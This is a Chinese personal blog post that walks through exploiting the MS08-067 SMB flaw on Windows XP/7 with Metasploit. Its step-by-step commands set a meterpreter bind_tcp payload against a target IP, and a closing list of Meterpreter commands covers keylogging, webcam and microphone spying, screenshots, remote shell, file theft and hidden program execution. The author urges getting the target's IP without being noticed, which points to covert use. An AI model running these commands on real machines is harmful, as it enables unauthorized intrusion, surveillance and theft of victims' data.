耀庄老弟的博客
SunbossRS
Mar 5, 2019
阅读本文可能需要 4 分钟。

Metasploit Framwork is not a good thing …
Oh,no! My computer!


前言

哈喽大家好。我又好久没更新博客了。
这段时间里我给我的电脑装上了kali。
(耀庄老弟你咋没事找事干呢)
其实事情是这样的,前一段时间我的电脑移到其他地方办公室去了。
然后我去插那边的网线,结果插上是插上了,电脑上也写着连接了,有因特访问。可是我进百度却进半天都没进去,竟然还连接超时,7456。
我请人看了,说是我电脑的问题,叫我装双系统。Okay,这就是我最近在为kali做准备的原因。
耀庄你这是要黑别人的电脑不成?
不过话说现在已经没事了,我用上了WIFI网卡。我还在想着入侵入侵入侵。。
反正就是一句话,没事找事干😜

准备材料

  • Kali电脑一部
  • 没装防火墙和360卫士或防火墙不稳定的电脑一部
    • 搭载WinXP或Win7
    • 可以是笔记本或台式机

01.开启Metasploit

Metasploit是一个安全渗透软件。Kali可以在终端root里输入:

msfconsole

来打开它。

02. 搜索Xp漏洞

我们可以查看漏洞在这个安全渗透环境查看windows的漏洞都有啥的。输入:

search platform: windows

或者是

search netapi

来搜索。
之后,你会看到有一个ms08-netapi的漏洞,利用等级是great
但确保你要攻击的电脑有这个ms08漏洞。如果没有,请试其他。

03.使用ms08漏洞并设置

使用该内容,输入:

use exploit/windows/smb/ms08_067netapi

你会发现命令的提示符旁边多了exploit(windows/smb/ms08_067-netapi),表示使用成功。 你可以通过info *内容名来详细查看这个内容。

04.设置载荷

载荷可以说是一个会话的类型设置。你可以看到命令的末尾有个bind_tcp
bind tcp可说是隐秘的会话。reverse_tcp是指通过软件发起的对话。我等会儿会讲软件传播。
输入。

set payload windows/meterpreter/bind_tcp

05.设置要控制的主机

另外,攻击Xp主机要先提前知道Xp的IP地址。
别被人发现,跑到Xp电脑进入cmd输入ipconfig查看ip地址。比如,我这里看到ip地址是192.108.1.104
回到你的kali前,输入:

set RHOST 192.108.1.104

这里是设定控制主机的ip地址。RHOST可说是全写Remote Host。

06.开始攻击!

做完这些后,你就可以开始了!输入!

exploit

该文章中的所有图片均为网上的图片。如果侵犯到了你的权利,可联系作者来进行删除。









Meterpreter命令集

  • 使用vnc查看桌面
    run vnc
    
  • 监视摄像头
    webcam_stream
    
  • 监视键盘按下内容
    keyscan_start
    //开启键盘记录
    keyscan_dump
    //显示键盘输入内容
    keyscan_stop
    //停止键盘记录
    
  • 录制声音
    record -d xx
    //录制音频xx秒
    record_mic
    //录制音频
    
  • 截屏
    screenshot
    
  • 进入cmd
    shell
    
  • 从目标机器下载东西
    download C:\\path\\to\\file
    
  • 从kali上传内容到目标机器
    upload ~/file C:\\path\\up\\
    
  • 查看有几个摄像头
    webcam_list
    

    -运行程序

    execute -f 文件名
    //运行文件
    execute -f -H 文件名
    //隐秘的运行应用
    execute -i -f -H 文件名
    //隐秘的交互进行应用,当文件名为cmd时meterpreter命令行会变成cmd